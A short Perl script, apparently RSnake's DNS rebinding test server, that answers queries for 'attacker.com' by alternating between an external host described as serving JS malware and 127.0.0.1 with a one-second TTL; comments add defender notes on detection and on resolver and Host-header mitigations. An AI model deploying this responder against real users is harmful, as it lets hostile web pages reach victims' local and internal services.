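#!/usr/bin/perl
#Very simple DNS Rebinding test code
#By RSnake - http://ha.ckers.org/
#
# Authoritative-only responder for a single test name ($host). For each
# querying peer it alternates the A record between $original_ip and
# $rebind_ip, always with a 1-second TTL.
#
# Defender notes:
#   - On the wire this shows up as a public name whose A record carries a
#     very low TTL and flips between an external address and a
#     loopback/private one.
#   - Recursive resolvers can drop such answers (e.g. dnsmasq
#     --stop-dns-rebind, Unbound private-address), and the service on the
#     rebind target can reject requests whose Host header is not one of
#     its own names.

use strict;
use warnings;

use Net::DNS::Nameserver;

my $port        = 53;
my $host        = "attacker.com";       #DNS to rebind
my $original_ip = '123.123.123.123';    #Box with JS malware on it
my $rebind_ip   = '127.0.0.1';          #IP to rebind $host's IP address to
my $ip          = '10.10.10.10';        #IP to bind this DNS server to

# Per-peer answer state, keyed by the address the query came from.
#   2         => $original_ip was served last; the next answer is $rebind_ip
#   1 / unset => the next answer is $original_ip
# The key is the sender of the DNS query (typically a recursive resolver,
# not the end client), so every client behind one resolver shares a slot.
my %ips;

# ReplyHandler callback passed to Net::DNS::Nameserver below.
#
# Arguments: query name, class, type, the peer's address, the query packet
#            and a connection hash (only its "sockhost" entry is read here).
# Returns:   ($rcode, \@ans, \@auth, \@add, { aa => 1 }).
#            A queries for $host get one A record; "foo.example.com" gets an
#            empty NOERROR; everything else gets NXDOMAIN.
sub reply_handler {
    my ($qname, $qclass, $qtype, $peerhost, $query, $conn) = @_;
    my ($rcode, @ans, @auth, @add);

    print "Received query from $peerhost to ". $conn->{"sockhost"}. "\n";

    if ($qtype eq "A" && $qname eq $host) {
        my ($ttl, $rdata);

        # Default the state to 0 so that the first query from a peer does
        # not compare undef numerically (a "Use of uninitialized value"
        # warning under `use warnings`).
        my $state = $ips{$peerhost} || 0;

        if ($state == 2) {
            ($ttl, $rdata) = (1, $rebind_ip);
            $ips{$peerhost} = 1;
        }
        else {
            ($ttl, $rdata) = (1, $original_ip);
            $ips{$peerhost} = 2;
        }

        push @ans, Net::DNS::RR->new("$qname $ttl $qclass $qtype $rdata");
        $rcode = "NOERROR";
    }
    elsif ($qname eq "foo.example.com") {
        $rcode = "NOERROR";
    }
    else {
        $rcode = "NXDOMAIN";
    }

    # mark the answer as authoritative (by setting the 'aa' flag)
    return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
}

my $ns = Net::DNS::Nameserver->new(
    LocalAddr    => [$ip],
    LocalPort    => $port,
    ReplyHandler => \&reply_handler,
    Verbose      => 1,
) or die "couldn't create nameserver object\n";

# Blocks here, serving queries until the process is stopped.
$ns->main_loop;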